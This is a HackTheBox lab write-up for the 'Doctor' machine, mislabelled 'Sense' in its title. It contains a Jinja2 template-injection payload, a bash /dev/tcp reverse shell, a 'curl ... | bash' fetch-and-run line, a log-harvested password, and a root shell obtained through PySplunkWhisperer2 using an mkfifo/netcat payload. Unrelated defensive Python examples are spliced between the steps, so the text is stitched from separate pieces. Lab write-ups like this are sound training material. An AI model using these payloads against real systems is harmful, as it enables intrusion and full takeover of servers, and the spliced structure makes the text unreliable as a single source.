Sense-htb-writeup

0x00 Skills covered

Skills in this chapter: Jinja2 template injection, log review through the adm group, PySplunkWhisperer2 exploitation

Reference: https://blog.0xzon.dev/2022-03-22-HTB-Doctor/

Reference: https://cyberkareem.medium.com/hackthebox-doctor-walkthrough-ee3abf80e99

0x01 Getting user access

1. Get the target IP address: 10.10.10.209

2. Check connectivity to the target

┌──(kali㉿kali)-[~/桌面]
└─$ ping 10.10.10.209 -c 4
PING 10.10.10.209 (10.10.10.209) 56(84) bytes of data.
64 bytes from 10.10.10.209: icmp_seq=1 ttl=63 time=294 ms
64 bytes from 10.10.10.209: icmp_seq=2 ttl=63 time=279 ms
64 bytes from 10.10.10.209: icmp_seq=3 ttl=63 time=277 ms
64 bytes from 10.10.10.209: icmp_seq=4 ttl=63 time=278 ms

--- 10.10.10.209 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3004ms
rtt min/avg/max/mdev = 277.209/281.900/293.508/6.729 ms

3. Scan for open ports

┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -p- --min-rate=10000 -oG braker-allports 10.10.10.209
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 20:16 CST
Nmap scan report for 10.10.10.209
Host is up (0.28s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8089/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 14.25 seconds

┌──(kali㉿kali)-[~/桌面]
└─$ grep -oP '([0-9]+)/open' braker-allports | awk -F/ '{print $1}' | tr '\n' ','
22,80,8089,
┌──(kali㉿kali)-[~/桌面]
└─$ sudo nmap -sV -sC -p22,80,8089 10.10.10.209
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-23 20:17 CST
Nmap scan report for 10.10.10.209
Host is up (0.61s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 59:4d:4e:c2:d8:cf:da:9d:a8:c8:d0:fd:99:a8:46:17 (RSA)
| 256 7f:f3:dc:fb:2d:af:cb:ff:99:34:ac:e0:f8:00:1e:47 (ECDSA)
|_ 256 53:0e:96:6b:9c:e9:c1:a1:70:51:6c:2d:ce:7b:43:e8 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Doctor
|_http-server-header: Apache/2.4.41 (Ubuntu)
8089/tcp open ssl/http Splunkd httpd
| http-robots.txt: 1 disallowed entry
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2020-09-06T15:57:27
|_Not valid after: 2023-09-06T15:57:27
|_http-title: splunkd
|_http-server-header: Splunkd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.78 seconds

4. Look at the website on port 80

5. The home page reveals a domain name; bind it to the target address in the local hosts file

┌──(kali㉿kali)-[~/桌面]
└─$ echo "10.10.10.209 doctors.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.209 doctors.htb

6. Visiting the doctors.htb domain reveals a web application; following its prompt, register a test account

Email: test@qq.com
Password: test

7. Log in with that account

8. After logging in there is a page for creating posts; try entering an XSS payload there

http://doctors.htb/post/new

9. Nothing of interest shows on the home page, but the page source reveals a directory path

10. This points to a template injection vulnerability: the site is built with Python and uses Jinja2 templates

https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

11. Try the payload from the reference above and see whether any output is displayed

{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read() }}

12. Check the output in that special directory

13. The command output is retrieved successfully, so build a reverse shell to obtain the initial foothold

┌──(kali㉿kali)-[~/桌面]
└─$ cat shell.sh
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.2/443 0>&1

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.10.209 - - [23/Dec/2023 21:18:56] "GET /shell.sh HTTP/1.1" 200 -

# enter the following statement in the post page
{{ self._TemplateReference__context.cycler.__init__.__globals__.os.popen('curl 10.10.14.2:8000/shell.sh |bash').read() }}

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.209] 59746
bash: cannot set terminal process group (886): Inappropriate ioctl for device
bash: no job control in this shell
web@doctor:~$ id
id
uid=1001(web) gid=1001(web) groups=1001(web),4(adm)

14. At this point the initial foothold is obtained.

15. Since we are in the adm group, we can use it to gather more information

This user looks interesting. The groups command shows that the current user is a member of the adm group. This group is used for system monitoring tasks and grants read access to the log files located in /var/log. Log files are a good place to look for forgotten or misplaced passwords, and the grep utility will come in handy.
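Why the payload in step 11 works and what the fix looks like, as an added example that is not code from the writeup or from the Doctor application. It assumes the app rendered the user's post text as the template itself (the render_template_string(user_input) anti-pattern); the hardened form keeps the template static and passes user data as a context value, with Jinja2's sandbox shown as defence in depth.

```python
"""Added example: Jinja2 SSTI root cause, fix, and sandbox behaviour."""
from jinja2 import Environment
from jinja2.exceptions import SecurityError
from jinja2.sandbox import SandboxedEnvironment

# Harmless probe: it only evaluates when the input is compiled as a template.
PROBE = "{{ 7*7 }}"
# Start of the attribute walk used on the page (self -> private context -> cycler -> ...).
PAGE_CHAIN = "{{ self._TemplateReference__context.cycler }}"


def render_vulnerable(user_input: str) -> str:
    """Bug pattern (assumed for the Doctor app): the user's string *is* the template,
    so any {{ ... }} expression inside it is evaluated server-side."""
    return Environment().from_string("<h1>" + user_input + "</h1>").render()


def render_fixed(user_input: str) -> str:
    """Fix: the template is a constant; user data only ever enters as a context
    variable, so braces are inert text (and autoescape handles HTML metacharacters)."""
    env = Environment(autoescape=True)
    return env.from_string("<h1>{{ title }}</h1>").render(title=user_input)


def render_sandboxed(template_src: str) -> str:
    """Defence in depth when templates must be user-authored: the sandbox treats
    attributes starting with '_' as unsafe, so the walk towards __globals__/os
    raises SecurityError instead of resolving. Returns 'BLOCKED' in that case."""
    try:
        return SandboxedEnvironment().from_string(template_src).render()
    except SecurityError:
        return "BLOCKED"


if __name__ == "__main__":
    print(render_vulnerable(PROBE))   # <h1>49</h1>  -> expression executed
    print(render_fixed(PROBE))        # <h1>{{ 7*7 }}</h1>  -> literal text
    print(render_sandboxed(PAGE_CHAIN))  # BLOCKED
```

A `49` in the response to the probe is the detection signal a reviewer should look for; the sandbox still evaluates arithmetic, so it reduces impact rather than hiding the injection.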

web@doctor:~$ grep -R -e 'password' /var/log/
grep -R -e 'password' /var/log/
grep: /var/log/boot.log.2: Permission denied
/var/log/auth.log:Dec 23 14:06:48 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:48 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:49 doctor VGAuth[674]: message repeated 4 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
/var/log/auth.log:Dec 23 14:06:49 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:50 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:53 doctor VGAuth[674]: message repeated 13 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
/var/log/auth.log:Dec 23 14:06:53 doctor VGAuth[674]: vmtoolsd: Username and password successfully validated for 'root'.
/var/log/auth.log:Dec 23 14:06:54 doctor VGAuth[674]: message repeated 7 times: [ vmtoolsd: Username and password successfully validated for 'root'.]
grep: /var/log/boot.log.4: Permission denied
grep: /var/log/speech-dispatcher: Permission denied
grep: /var/log/vmware-network.4.log: Permission denied
/var/log/auth.log.1:Sep 22 13:01:23 doctor sshd[1704]: Failed password for invalid user shaun from 10.10.14.2 port 40896 ssh2
/var/log/auth.log.1:Sep 22 13:01:28 doctor sshd[1704]: Failed password for invalid user shaun from 10.10.14.2 port 40896 ssh2
grep: /var/log/vmware-network.9.log: Permission denied
grep: /var/log/vmware-network.1.log: Permission denied
/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
grep: /var/log/vmware-network.5.log: Permission denied
grep: /var/log/vmware-network.6.log: Permission denied
grep: /var/log/vmware-vmsvc-root.1.log: Permission denied
grep: /var/log/vmware-network.3.log: Permission denied
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1001@8612c285930942bc8295a5e5404c6fb7-000000000000d0e1-0005ae7b997ca2d8.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system@68325fc054024f8aac6fcf2ce991a876-000000000000cf5a-0005ae7b98c1acfe.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system@68325fc054024f8aac6fcf2ce991a876-0000000000003ac7-0005ab70dc697773.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/user-1002@84e1503b20fd49eca2b6ca0b7d6fdeeb-00000000000176d6-0005af5694057aa6.journal matches
Binary file /var/log/journal/62307f5876ce4bdeb1a4be33bebfb978/system@68325fc054024f8aac6fcf2ce991a876-0000000000033c8f-0005afad8045c159.journal matches
grep: /var/log/boot.log: Permission denied
grep: /var/log/vmware-vmtoolsd-root.log: Permission denied
grep: /var/log/btmp: Permission denied
grep: /var/log/vmware-network.7.log: Permission denied
grep: /var/log/btmp.1: Permission denied
grep: /var/log/boot.log.3: Permission denied
grep: /var/log/vmware-vmsvc-root.3.log: Permission denied
grep: /var/log/vmware-network.2.log: Permission denied
grep: /var/log/boot.log.7: Permission denied
grep: /var/log/boot.log.6: Permission denied
grep: /var/log/boot.log.1: Permission denied
grep: /var/log/vmware-vmsvc-root.log: Permission denied
grep: /var/log/vmware-network.8.log: Permission denied
grep: /var/log/private: Permission denied
grep: /var/log/vmware-vmsvc-root.2.log: Permission denied
grep: /var/log/boot.log.5: Permission denied
grep: /var/log/vmware-network.log: Permission denied
web@doctor:~$

/var/log/apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"

16. In the output above we found a credential: shaun:Guitar123

17. With this password we obtain the first flag
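A defender's version of the grep above, as an added example that is not part of the writeup: a small Apache access-log scanner that flags query parameters on authentication endpoints or with secret-like names, which is exactly how the password ended up in /var/log/apache2/backup (typed into the email field of a reset form and logged in the request line). The sample log is constructed for the demo; its first line is the one quoted from the writeup, and the endpoint and parameter lists are assumptions.

```python
"""Added example: flag credentials leaking into web server logs."""
import re
from urllib.parse import parse_qsl, urlsplit

# Tolerant of the writeup's line, which has no "HTTP/1.1" token after the path.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>[^"\s]+)(?: [^"]*)?" (?P<status>\d{3})'
)
# Assumed lists; extend for the application being reviewed.
SECRET_PARAMS = {"password", "passwd", "pwd", "pass", "token", "secret", "apikey", "api_key"}
SENSITIVE_PATHS = {"/reset_password", "/login", "/register", "/change_password"}


def scan_line(line):
    """Return a finding for one log line, or None when nothing looks like a leak."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    params = parse_qsl(url.query, keep_blank_values=True)
    if url.path in SENSITIVE_PATHS:
        # Any non-empty query value on an auth endpoint is suspect: Doctor's leak
        # was ?email=<password>, so a name-based check alone would have missed it.
        hits = [k for k, v in params if v]
    else:
        hits = [k for k, v in params if k.lower() in SECRET_PARAMS and v]
    if not hits:
        return None
    return {"ip": m.group("ip"), "path": url.path,
            "params": sorted(hits), "status": m.group("status")}


def scan_log(text):
    """Scan a whole log; returns findings in file order."""
    return [f for f in (scan_line(l) for l in text.splitlines()) if f]


# Constructed sample: line 1 is from the writeup, the rest are made up for the demo.
SAMPLE_LOG = """\
10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password"
10.10.14.4 - - [05/Sep/2020:11:18:01 +2000] "GET /static/main.css HTTP/1.1" 200 1032 "-"
10.10.14.4 - - [05/Sep/2020:11:19:12 +2000] "GET /login?user=alice&password=hunter2 HTTP/1.1" 302 0 "-"
10.10.14.4 - - [05/Sep/2020:11:20:45 +2000] "GET /post/new HTTP/1.1" 200 2001 "-"
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The real mitigation is on the application side (never accept credentials in a query string, and keep adm-group membership off service accounts such as web); the scanner just shows how quickly such a leak is found by anyone who can read the logs.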

web@doctor:~$ su shaun
su shaun
Password: Guitar123
id
uid=1002(shaun) gid=1002(shaun) groups=1002(shaun)
python3 -c 'import pty;pty.spawn("/bin/bash")'
shaun@doctor:/home/web$ cd ~
cd ~
shaun@doctor:~$ ls
ls
user.txt
shaun@doctor:~$ cat user.txt
cat user.txt
570876d87ef81abd010b0d3378ddeba3
shaun@doctor:~$

0x02 Getting root

18. sudo -l shows nothing useful

shaun@doctor:~$ sudo -l
sudo -l
[sudo] password for shaun: Guitar123

Sorry, user shaun may not run sudo on doctor.

19. Combining this with the Splunkd service found on port 8089 during the initial scan, our approach starts here; see the hint in the reference writeup

https://airman604.medium.com/splunk-universal-forwarder-hijacking-5899c3e0e6b2

Recall from our initial enumeration that a Splunk forwarder instance is running on port 8089. Searching online for the keywords "splunk universal forwarder vulnerability" reveals this article, which details using SplunkWhisperer2 to obtain a shell as the root account.

This is possible because the Splunk Universal Forwarder includes a management service listening on port 8089 that, by default, allows remote connections. The management service can be used to send a single command or script to the universal forwarder agent through the Splunk API, and the UF agent does not verify that the received connection comes from a valid Splunk Enterprise server, nor does it verify that the code is signed or otherwise proven to come from a Splunk Enterprise server.

The exploit assumes that the Splunk Universal Forwarder is running in the context of root. Let's verify that.

20. Check the process list

shaun@doctor:~$ ps -aux | grep splunk
ps -aux | grep splunk
root 1136 0.1 2.1 257468 86140 ? Sl 14:06 0:02 splunkd -p 8089 start
root 1138 0.0 0.3 77664 13408 ? Ss 14:06 0:00 [splunkd pid=1136] splunkd -p 8089 start [process-runner]
shaun 1819 0.0 0.0 17668 732 pts/0 R+ 14:32 0:00 grep --color=auto splunk
shaun@doctor:~$

21. This confirms that the PySplunkWhisperer2 technique is the way to escalate privileges here

https://github.com/cnotin/SplunkWhisperer2
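The two conditions the reference quoted above names (management port reachable, splunkd running as root) can be audited from the forwarder's own configuration and the ps output, as an added example that is not part of the writeup or of the SplunkWhisperer2 project. It assumes server.conf is supplied as INI text (both variants below are constructed); the setting checked is the real server.conf [httpServer] disableDefaultPort, and the hardened owner name splunkfwd is just a sample value.

```python
"""Added example: audit a Universal Forwarder for the escalation preconditions."""
import configparser

# Constructed server.conf fragments: weak (defaults) and hardened.
WEAK_CONF = """\
[general]
serverName = doctor
"""
HARDENED_CONF = """\
[general]
serverName = doctor
[httpServer]
disableDefaultPort = true
"""
# ps line copied from the writeup.
PS_SAMPLE = "root 1136 0.1 2.1 257468 86140 ? Sl 14:06 0:02 splunkd -p 8089 start"


def audit_forwarder(server_conf: str, process_user: str) -> list:
    """Return a list of findings; empty means both preconditions are closed."""
    cp = configparser.ConfigParser()
    cp.read_string(server_conf)
    findings = []
    # Port 8089 stays open unless explicitly disabled: a missing stanza or option
    # means the default, which is "enabled", so fallback=False is the unsafe case.
    if not cp.getboolean("httpServer", "disableDefaultPort", fallback=False):
        findings.append("management port 8089 enabled: remote app/script push is "
                        "accepted from anyone holding a valid Splunk login")
    if process_user == "root":
        findings.append("splunkd runs as root: a pushed script executes as uid 0")
    return findings


def owner_from_ps(ps_output: str) -> str:
    """Owner of the splunkd process from `ps aux` text (command is column 11)."""
    for line in ps_output.splitlines():
        cols = line.split()
        if len(cols) > 10 and cols[10] == "splunkd":
            return cols[0]
    return "unknown"


if __name__ == "__main__":
    for f in audit_forwarder(WEAK_CONF, owner_from_ps(PS_SAMPLE)):
        print("[!]", f)
    print(audit_forwarder(HARDENED_CONF, "splunkfwd"))  # []
```

Closing only one of the two findings is not enough: a non-root forwarder with the port open still lets any valid Splunk credential run code as that account, and a root forwarder with the port closed is one credential leak away from the same outcome if the port is ever re-enabled.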

22. Next, clone the tool locally and test it with a harmless payload

┌──(kali㉿kali)-[~/桌面]
└─$ git clone https://github.com/cnotin/SplunkWhisperer2
正克隆到 'SplunkWhisperer2'...
remote: Enumerating objects: 77, done.
remote: Counting objects: 100% (23/23), done.
remote: Compressing objects: 100% (14/14), done.
remote: Total 77 (delta 10), reused 13 (delta 9), pack-reused 54
接收对象中: 100% (77/77), 25.45 KiB | 248.00 KiB/s, 完成.
处理 delta 中: 100% (29/29), 完成.

┌──(kali㉿kali)-[~/桌面]
└─$ cd SplunkWhisperer2/PySplunkWhisperer2

python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --username shaun --password Guitar123 --payload id

┌──(kali㉿kali)-[~/桌面/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --lhost 10.10.14.2 --username shaun --password Guitar123 --payload id
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmpumpvcaia.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.2:8181/
10.10.10.209 - - [23/Dec/2023 21:40:27] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup
[.] Removing app...
[+] App removed
[+] Stopped HTTP server
Bye!

23. The approach works, so run the real payload

┌──(kali㉿kali)-[~/桌面/SplunkWhisperer2/PySplunkWhisperer2]
└─$ python3 PySplunkWhisperer2_remote.py --host 10.10.10.209 --username shaun --password Guitar123 --lhost 10.10.14.2 --payload 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.2 10086 >/tmp/f'
Running in remote mode (Remote Code Execution)
[.] Authenticating...
[+] Authenticated
[.] Creating malicious app bundle...
[+] Created malicious app bundle in: /tmp/tmp8dt_f0ce.tar
[+] Started HTTP server for remote mode
[.] Installing app from: http://10.10.14.2:8181/
10.10.10.209 - - [23/Dec/2023 21:42:18] "GET / HTTP/1.1" 200 -
[+] App installed, your code should be running now!

Press RETURN to cleanup

24. On the listening port we receive the final root shell

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 10086
listening on [any] 10086 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.209] 57194
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
4f44afffce27dd002fb36bffbc71c7df
#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/278


Source: https://sh1yan.top/2023/12/21/Doctor-htb-writeup/
Author: shiyan
Published: 21 December 2023